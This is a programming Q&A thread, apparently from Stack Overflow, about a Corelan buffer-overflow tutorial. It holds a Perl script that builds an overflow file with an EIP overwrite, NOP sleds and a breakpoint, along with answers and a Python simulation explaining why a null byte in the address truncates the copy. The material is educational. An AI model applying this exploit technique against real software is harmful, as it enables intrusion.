Abundance

Reputation: 2173

Why is ESP filled with null bytes after following EIP address?

I'm following Corelan's tutorial on buffer overflows (https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) and have written the following code:

use strict;
use warnings;

my $file      = "crash.m3u";
my $junk      = "\x41" x 26063;            # 26063 'A' bytes to fill the buffer
my $eip       = pack('V', 0x000ff710);     # 32-bit little-endian: bytes 10 f7 0f 00
my $shellcode = "\x90" x 25;               # NOP sled

$shellcode = $shellcode . "\xcc";          # int 3 software breakpoint
$shellcode = $shellcode . "\x90" x 25;     # second NOP sled

open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                            # write raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);

The code basically overflows a buffer so that the EIP is overwritten with the address 0x000ff710. I'm expecting the stack to include the written shellcode \x90, as well as the \xcc.

I open the code in Immunity Debugger and see that EIP and ESP both point to 0x000ff710. Since the next part of my script is the shellcode, I naturally expect to see the shellcode there on the stack. Instead, I see a bunch of null bytes, namely the sequence 00 00 00 01 00 00 ... etc., and then eventually followed by a whole bunch of A's. Corelan explains this as "000ff730 [0x000f710 in my case] contains a null byte, which is a string terminator… so the A's you are seeing are coming from the first part of the buffer… We never reached the point where we started writing our data after overwrite EIP…".

Can someone explain where the null bytes come from? Furthermore, where did the shellcode in my code, the NOPs and the break, go to?

Upvotes: 0

Views: 988

Answers (2)

Marker

Reputation: 1

0x000ff710 contains a null byte.

The program will read data until it finds 0x00.

The 0x90 and 0xcc bytes which follow the 0x00 will never be read by the program.

So you will never find shellcode such as 90 90 90 90 90 90 90 90... in your code.

Upvotes: 0

cfz42

Reputation: 384

Can someone explain where the null bytes come from?

0x000ff710 is responsible for them (well, it). Indeed, 0x000ff710 is mapped into memory as is with the pack function, which makes sure you are writing an address, which is an unsigned long of 32 bits = 4 bytes = 0x00, 0x0f, 0xf7, 0x10.

As you can see, the first byte (0x00) is NULL.

Furthermore, where did the shellcode in my code, the NOPs and the break, go to?

Your code is basically a Perl script that is going to generate a .m3u file named crash.m3u. You craft it by adding 26063 junk 'A' bytes (0x41) to the beginning of the file (right after the open), to which you concatenate with the . operator (usually the one used for concatenation in many languages) an address, here 0x000ff710. Lastly, you concatenate to this your shellcode (a bunch of NOPs with an int 3 or int 0xcc, which sets up a breakpoint for your debugger).

Your code is "printed" to the file crash.m3u. If you aren't familiar with the concept of writing to a file, I suggest you open a shell and type these commands:

echo "that's some text"

echo "that's some text in a file" > myfile

The former will output the message to the standard output, while the latter will output it to a file.

print $FILE $junk.$eip.$shellcode; "prints" your shellcode to the file $FILE.

Upvotes: 1
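As an added example (not code from the question, either answer, or the Corelan tutorial), the Python script below rebuilds the exact byte sequence the Perl script writes and then simulates what a C string routine such as strcpy sees when it copies that data. Perl's pack('V') emits the address little-endian, so the four bytes are 10 f7 0f 00 and the null byte is the last of them. A strcpy-style copy writes everything up to and including that terminator, which is why the full address still lands in EIP, while every byte after it (the NOP sleds and the 0xcc) is never copied. The function names and the dictionary of results are my own choices, not part of the original post.

```python
import struct

# Values copied from the question's Perl script.
JUNK_LEN = 26063          # number of 0x41 ('A') filler bytes
EIP_ADDR = 0x000ff710     # address written over the saved return address
NOP_SLED = 25             # NOPs on each side of the int 3


def build_payload(junk_len=JUNK_LEN, eip_addr=EIP_ADDR, nops=NOP_SLED):
    """Reproduce the bytes the Perl script writes to crash.m3u.

    struct.pack('<I') is the Python equivalent of Perl's pack('V'):
    a 32-bit unsigned integer in little-endian byte order.
    """
    junk = b"\x41" * junk_len
    eip = struct.pack("<I", eip_addr)
    shellcode = b"\x90" * nops + b"\xcc" + b"\x90" * nops
    return junk + eip + shellcode


def first_nul_offset(data):
    """Offset of the first 0x00 byte in data, or None if there is none."""
    i = data.find(b"\x00")
    return None if i < 0 else i


def c_string_copy(data):
    """Simulate a strcpy-style copy of data.

    C string functions treat 0x00 as the end of the string: they copy every
    byte up to and including the first NUL and stop. Bytes after it never
    reach the destination buffer.
    """
    i = data.find(b"\x00")
    return data if i < 0 else data[: i + 1]


def analyse(payload, junk_len=JUNK_LEN):
    """Summarise what survives a C string copy of the payload."""
    copied = c_string_copy(payload)
    return {
        "payload_len": len(payload),
        "first_nul": first_nul_offset(payload),
        # The four bytes that overwrite EIP, in the order they sit in the file.
        "eip_bytes": payload[junk_len:junk_len + 4].hex(),
        "copied_len": len(copied),
        "dropped_len": len(payload) - len(copied),
        "nops_copied": copied.count(b"\x90"),
        "int3_copied": b"\xcc" in copied,
    }


if __name__ == "__main__":
    report = analyse(build_payload())
    for key, value in report.items():
        print(f"{key:>12}: {value}")
```

Running it shows the first NUL at offset 26066 (the fourth byte of the packed address), 26067 bytes copied, and 51 bytes dropped: exactly the 25 + 1 + 25 bytes of NOPs and the breakpoint. That is the concrete form of Corelan's remark that the copy never reaches the data placed after the EIP overwrite; what the debugger shows at ESP is whatever the stack already held there.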
